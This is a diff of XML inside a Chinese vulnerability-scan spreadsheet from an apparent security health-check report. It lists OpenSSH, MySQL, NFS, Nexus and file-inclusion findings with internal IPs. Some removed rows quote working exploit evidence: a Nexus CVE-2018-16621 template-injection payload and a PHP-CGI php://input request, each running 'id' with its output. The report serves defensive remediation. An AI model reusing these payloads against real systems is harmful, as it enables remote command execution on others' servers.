JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X41" t="inlineStr">
@@ -6140,7 +5156,7 @@
     <row r="42">
       <c r="A42" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>OpenSSH 访问控制错误漏洞(CVE-2019-6110)</t>
         </is>
       </c>
       <c r="B42" t="inlineStr">
@@ -6153,15 +5169,19 @@
           <t>中危</t>
         </is>
       </c>
-      <c r="D42" t="inlineStr"/>
+      <c r="D42" t="inlineStr">
+        <is>
+          <t>访问控制错误</t>
+        </is>
+      </c>
       <c r="E42" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F42" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>OpenSSH中的SCP客户端实用程序存在安全漏洞。攻击者可利用该漏洞伪造被显示的文件名。</t>
         </is>
       </c>
       <c r="G42" t="inlineStr">
@@ -6171,37 +5191,37 @@
       </c>
       <c r="H42" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I42" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J42" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2019-6110</t>
         </is>
       </c>
       <c r="K42" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L42" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M42" t="inlineStr">
         <is>
-          <t>192.168.54.68</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N42" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O42" t="inlineStr">
@@ -6209,11 +5229,7 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P42" t="inlineStr">
-        <is>
-          <t>父组名</t>
-        </is>
-      </c>
+      <c r="P42" t="inlineStr"/>
       <c r="Q42" t="inlineStr"/>
       <c r="R42" t="inlineStr">
         <is>
@@ -6222,12 +5238,12 @@
       </c>
       <c r="S42" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T42" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U42" t="inlineStr"/>
@@ -6238,29 +5254,7 @@
       </c>
       <c r="W42" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X42" t="inlineStr">
@@ -6277,7 +5271,7 @@
     <row r="43">
       <c r="A43" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>Linux nfsd 远程缓冲区溢出漏洞（CVE-1999-0832）</t>
         </is>
       </c>
       <c r="B43" t="inlineStr">
@@ -6287,18 +5281,22 @@
       </c>
       <c r="C43" t="inlineStr">
         <is>
-          <t>中危</t>
-        </is>
-      </c>
-      <c r="D43" t="inlineStr"/>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D43" t="inlineStr">
+        <is>
+          <t>信息发现</t>
+        </is>
+      </c>
       <c r="E43" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>暂无解决方案，该插件只是检测主机服务信息，并不检测漏洞信息, 如不使用，可关闭或禁用此服务。</t>
         </is>
       </c>
       <c r="F43" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>基于Linux平台的NFS服务器存在缓冲区溢出漏洞。攻击者可以通过一个长路径名执行命令。</t>
         </is>
       </c>
       <c r="G43" t="inlineStr">
@@ -6308,7 +5306,7 @@
       </c>
       <c r="H43" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I43" t="inlineStr">
@@ -6318,27 +5316,27 @@
       </c>
       <c r="J43" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-1999-0832</t>
         </is>
       </c>
       <c r="K43" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L43" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M43" t="inlineStr">
         <is>
-          <t>192.168.51.66</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N43" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O43" t="inlineStr">
@@ -6346,11 +5344,7 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P43" t="inlineStr">
-        <is>
-          <t>子组名</t>
-        </is>
-      </c>
+      <c r="P43" t="inlineStr"/>
       <c r="Q43" t="inlineStr"/>
       <c r="R43" t="inlineStr">
         <is>
@@ -6359,15 +5353,19 @@
       </c>
       <c r="S43" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T43" t="inlineStr">
         <is>
-          <t>123</t>
-        </is>
-      </c>
-      <c r="U43" t="inlineStr"/>
+          <t>20048</t>
+        </is>
+      </c>
+      <c r="U43" t="inlineStr">
+        <is>
+          <t>http://10.128.160.50:20048</t>
+        </is>
+      </c>
       <c r="V43" t="inlineStr">
         <is>
           <t>未知</t>
@@ -6375,312 +5373,18 @@
       </c>
       <c r="W43" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>页面url: http://10.128.160.50:20048
+请求体: -
+响应体: -
+举证描述: 在主机上的20048端口上发现nfs服务</t>
         </is>
       </c>
       <c r="X43" t="inlineStr">
         <is>
-          <t>待处置</t>
+          <t>处置中</t>
         </is>
       </c>
       <c r="Y43" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="44">
-      <c r="A44" t="inlineStr">
-        <is>
-          <t>Nexus Repository Manager3远程命令执行漏洞(CVE-2018-16621)</t>
-        </is>
-      </c>
-      <c r="B44" t="inlineStr">
-        <is>
-          <t>尽快修复</t>
-        </is>
-      </c>
-      <c r="C44" t="inlineStr">
-        <is>
-          <t>高危</t>
-        </is>
-      </c>
-      <c r="D44" t="inlineStr">
-        <is>
-          <t>命令执行</t>
-        </is>
-      </c>
-      <c r="E44" t="inlineStr">
-        <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://support.sonatype.com/hc/en-us/articles/360010789153-CVE-2018-16621-Nexus-Repository-Manager-Java-Injection-October-17-2018</t>
-        </is>
-      </c>
-      <c r="F44" t="inlineStr">
-        <is>
-          <t>Sonatype Nexus Repository Manager（NXRM）是美国Sonatype公司的一款Maven仓库管理器。</t>
-        </is>
-      </c>
-      <c r="G44" t="inlineStr">
-        <is>
-          <t>活跃漏洞</t>
-        </is>
-      </c>
-      <c r="H44" t="inlineStr">
-        <is>
-          <t>STA</t>
-        </is>
-      </c>
-      <c r="I44" t="inlineStr">
-        <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J44" t="inlineStr">
-        <is>
-          <t>CVE-2018-16621</t>
-        </is>
-      </c>
-      <c r="K44" t="inlineStr">
-        <is>
-          <t>2026-07-10 18:44</t>
-        </is>
-      </c>
-      <c r="L44" t="inlineStr">
-        <is>
-          <t>2026-07-10 18:29</t>
-        </is>
-      </c>
-      <c r="M44" t="inlineStr">
-        <is>
-          <t>10.15.73.136</t>
-        </is>
-      </c>
-      <c r="N44" t="inlineStr">
-        <is>
-          <t>其他</t>
-        </is>
-      </c>
-      <c r="O44" t="inlineStr">
-        <is>
-          <t>管理IP范围</t>
-        </is>
-      </c>
-      <c r="P44" t="inlineStr"/>
-      <c r="Q44" t="inlineStr"/>
-      <c r="R44" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S44" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T44" t="inlineStr">
-        <is>
-          <t>8081</t>
-        </is>
-      </c>
-      <c r="U44" t="inlineStr">
-        <is>
-          <t>10.70.48.221:8081/service/extdirect/poll/rapture_State_get</t>
-        </is>
-      </c>
-      <c r="V44" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="W44" t="inlineStr">
-        <is>
-          <t>页面url: 10.70.48.221:8081/service/extdirect/poll/rapture_State_get
-请求体: POST /service/extdirect/poll/rapture_State_get HTTP/1.1
-Host: 10.70.48.221:8081
-Connection: close
-Content-Length: 828
-X-Requested-With: XMLHttpRequest
-X-Nexus-UI: true
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
-NX-ANTI-CSRF-TOKEN: 0.8271645154111453
-Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-Accept: */*
-Origin: http://10.70.48.221:8081
-Referer: http://10.70.48.221:8081/
-Accept-Encoding: gzip, deflate
-Accept-Language: zh-CN,zh;q=0.9
-Cookie: stay_login=0; NX-ANTI-CSRF-TOKEN=0.8271645154111453; id=8MXOrymccWq3I1761ODN153600
-uiSettings=C:\'Wind'||'o'||'ws'|\System32\\#set ($x='')+#set($rt=$x.class.forName('java.lang.Runtime'))+#set($chr=$x.class.forName('java.lang.Character'))+#set($str=$x.class.forName('java.lang.String'))+#set($ex=$rt.getRuntime().exec('id'))+$ex.waitFor()+#set($out=$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&amp;nexus.react.repositories=7cb6efb98ba5972a9b5090dc2e517fe14d12cb04&amp;upload=5ffe533b830f08a0326348a9160afafc8ada44db&amp;acknowledgeAnalytics.required=7cb6efb98ba5972a9b5090dc2e517fe14d12cb04&amp;nexus.datastore.enabled=7cb6efb98ba5972a9b5090dc2e517fe14d12cb04&amp;allowScriptCreation=7cb6efb98ba5972a9b5090dc2e517fe14d12cb04&amp;serverId=cb1e6abc50e960ea8058a665db6a203811c59d98&amp;rebuildingRepositories=97d170e1550eee4afc0af065b78cda302a97674c&amp;nexus.datastore.developer=7cb6efb98
-响应体: HTTP/1.1 200 OK
-Connection: close
-Content-Type: text/html;charset=utf-8
-Content-Length: 82
-C:\'Wind'||'o'||'ws'|\System32\\ 0 uid=8983(solr) gid=8983(solr) groups=8983(solr)</t>
-        </is>
-      </c>
-      <c r="X44" t="inlineStr">
-        <is>
-          <t>待处置</t>
-        </is>
-      </c>
-      <c r="Y44" t="inlineStr">
-        <is>
-          <t>内网</t>
-        </is>
-      </c>
-    </row>
-    <row r="45">
-      <c r="A45" t="inlineStr">
-        <is>
-          <t>文件包含漏洞</t>
-        </is>
-      </c>
-      <c r="B45" t="inlineStr">
-        <is>
-          <t>尽快修复</t>
-        </is>
-      </c>
-      <c r="C45" t="inlineStr">
-        <is>
-          <t>高危</t>
-        </is>
-      </c>
-      <c r="D45" t="inlineStr">
-        <is>
-          <t>文件包含</t>
-        </is>
-      </c>
-      <c r="E45" t="inlineStr">
-        <is>
-          <t>编辑源代码以确保正确验证了输入。 建议尽可能列出可接受的文件名列表，并将输入内容限制为该列表(白名单策略)。对于PHP，"allow_url_fopen"选项通常允许程序员使用URL(而不是本地文件路径)打开，包含或使用远程文件。 建议从php.ini中禁用此选项。</t>
-        </is>
-      </c>
-      <c r="F45" t="inlineStr">
-        <is>
-          <t>此脚本可能容易受到文件包含攻击,该脚本似乎可以包含一个文件，该文件的名称由用户提供的数据确定。 该数据在传递给包含函数之前未正确验证。</t>
-        </is>
-      </c>
-      <c r="G45" t="inlineStr">
-        <is>
-          <t>有攻击代码披露</t>
-        </is>
-      </c>
-      <c r="H45" t="inlineStr">
-        <is>
-          <t>STA</t>
-        </is>
-      </c>
-      <c r="I45" t="inlineStr">
-        <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J45" t="inlineStr"/>
-      <c r="K45" t="inlineStr">
-        <is>
-          <t>2026-07-10 11:49</t>
-        </is>
-      </c>
-      <c r="L45" t="inlineStr">
-        <is>
-          <t>2026-07-10 11:49</t>
-        </is>
-      </c>
-      <c r="M45" t="inlineStr">
-        <is>
-          <t>10.128.160.30</t>
-        </is>
-      </c>
-      <c r="N45" t="inlineStr">
-        <is>
-          <t>其他</t>
-        </is>
-      </c>
-      <c r="O45" t="inlineStr">
-        <is>
-          <t>管理IP范围</t>
-        </is>
-      </c>
-      <c r="P45" t="inlineStr"/>
-      <c r="Q45" t="inlineStr"/>
-      <c r="R45" t="inlineStr">
-        <is>
-          <t>普通资产</t>
-        </is>
-      </c>
-      <c r="S45" t="inlineStr">
-        <is>
-          <t>台账资产</t>
-        </is>
-      </c>
-      <c r="T45" t="inlineStr">
-        <is>
-          <t>8080</t>
-        </is>
-      </c>
-      <c r="U45" t="inlineStr">
-        <is>
-          <t>192.168.180.222:8080/index.php?-d allow_url_include=on -d auto_prepend_file=php://input</t>
-        </is>
-      </c>
-      <c r="V45" t="inlineStr">
-        <is>
-          <t>未知</t>
-        </is>
-      </c>
-      <c r="W45" t="inlineStr">
-        <is>
-          <t>页面url: 192.168.180.222:8080/index.php?-d allow_url_include=on -d auto_prepend_file=php://input
-请求体: POST //index.php?-d+allow_url_include=on+-d+auto_prepend_file=php://input HTTP/1.1
-Host: 192.168.180.222:8080
-User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
-Accept-Encoding: gzip, deflate
-Connection: keep-alive
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 31
-&lt;?php echo shell_exec("id"); ?&gt;
-响应体: HTTP/1.1 200 OK
-Date: Tue, 12 Nov 2019 13:14:29 GMT
-Server: Apache/2.4.10 (Debian)
-X-Powered-By: PHP/5.4.1
-Content-Length: 44
-Keep-Alive: timeout=5, max=100
-Connection: Keep-Alive
-Content-Type: text/html; charset=utf-8
-Hello, 
-Your name is &lt;strong&gt;Vulhub&lt;/strong&gt;</t>
-        </is>
-      </c>
-      <c r="X45" t="inlineStr">
-        <is>
-          <t>待处置</t>
-        </is>
-      </c>
-      <c r="Y45" t="inlineStr">
         <is>
           <t>内网</t>
         </is>

--- a/安全体检报告/风险清单/漏洞清单.xlsx
+++ b/安全体检报告/风险清单/漏洞清单.xlsx
@@ -900,7 +900,7 @@
     <row r="5">
       <c r="A5" t="inlineStr">
         <is>
-          <t>OpenSSH 拒绝服务漏洞(CVE-2016-0778)</t>
+          <t>OpenSSH 拒绝服务漏洞(CVE-2016-1907)</t>
         </is>
       </c>
       <c r="B5" t="inlineStr">
@@ -910,7 +910,7 @@
       </c>
       <c r="C5" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D5" t="inlineStr">
@@ -920,12 +920,13 @@
       </c>
       <c r="E5" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.1p2</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://www.openssh.com/txt/release-7.1p2</t>
         </is>
       </c>
       <c r="F5" t="inlineStr">
         <is>
-          <t>OpenSSH的客户端中的roaming_common.c文件中的‘roaming_read’和‘roaming_write’函数中存在安全漏洞，该漏洞源于程序启用特定的代理和转发选项时，没有正确保持连接文件描述符。远程攻击者可通过发送多个转发请求利用该漏洞造成拒绝服务（基于堆的缓冲区溢出）</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.1p2之前版本的packet.c文件中的‘ssh_packet_read_poll2’函数中存在安全漏洞。远程攻击者可借助特制的网络流量利用该漏洞造成拒绝服务（越边界读取和应用程序崩溃）。</t>
         </is>
       </c>
       <c r="G5" t="inlineStr">
@@ -945,7 +946,7 @@
       </c>
       <c r="J5" t="inlineStr">
         <is>
-          <t>CVE-2016-0778</t>
+          <t>CVE-2016-1907</t>
         </is>
       </c>
       <c r="K5" t="inlineStr">
@@ -1242,7 +1243,7 @@
     <row r="8">
       <c r="A8" t="inlineStr">
         <is>
-          <t>OpenSSH 拒绝服务漏洞(CVE-2016-1907)</t>
+          <t>OpenSSH 拒绝服务漏洞(CVE-2016-0778)</t>
         </is>
       </c>
       <c r="B8" t="inlineStr">
@@ -1252,7 +1253,7 @@
       </c>
       <c r="C8" t="inlineStr">
         <is>
-          <t>中危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D8" t="inlineStr">
@@ -1262,13 +1263,12 @@
       </c>
       <c r="E8" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-http://www.openssh.com/txt/release-7.1p2</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.1p2</t>
         </is>
       </c>
       <c r="F8" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.1p2之前版本的packet.c文件中的‘ssh_packet_read_poll2’函数中存在安全漏洞。远程攻击者可借助特制的网络流量利用该漏洞造成拒绝服务（越边界读取和应用程序崩溃）。</t>
+          <t>OpenSSH的客户端中的roaming_common.c文件中的‘roaming_read’和‘roaming_write’函数中存在安全漏洞，该漏洞源于程序启用特定的代理和转发选项时，没有正确保持连接文件描述符。远程攻击者可通过发送多个转发请求利用该漏洞造成拒绝服务（基于堆的缓冲区溢出）</t>
         </is>
       </c>
       <c r="G8" t="inlineStr">
@@ -1288,7 +1288,7 @@
       </c>
       <c r="J8" t="inlineStr">
         <is>
-          <t>CVE-2016-1907</t>
+          <t>CVE-2016-0778</t>
         </is>
       </c>
       <c r="K8" t="inlineStr">
@@ -1473,7 +1473,7 @@
     <row r="10">
       <c r="A10" t="inlineStr">
         <is>
-          <t>OpenSSH auth_password函数拒绝服务漏洞(CVE-2016-6515)</t>
+          <t>OpenSSH 安全漏洞(CVE-2021-28041)</t>
         </is>
       </c>
       <c r="B10" t="inlineStr">
@@ -1486,20 +1486,16 @@
           <t>高危</t>
         </is>
       </c>
-      <c r="D10" t="inlineStr">
-        <is>
-          <t>拒绝服务</t>
-        </is>
-      </c>
+      <c r="D10" t="inlineStr"/>
       <c r="E10" t="inlineStr">
         <is>
-          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
-https://github.com/openssh/openssh-portable/commit/fcd135c9df440bcd2d5870405ad3311743d78d97</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
+https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db</t>
         </is>
       </c>
       <c r="F10" t="inlineStr">
         <is>
-          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 7.3之前的版本中的sshd中的auth-passwd.c文件中的‘auth_password’函数存在输入验证错误漏洞，该漏洞源于程序没有在密码验证中限制密码长度。远程攻击者可借助长的字符串利用该漏洞造成拒绝服务(CPU消耗)。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH before 8.5 存在安全漏洞，攻击者可利用该漏洞在遗留操作系统上不受约束的代理套接字访问。</t>
         </is>
       </c>
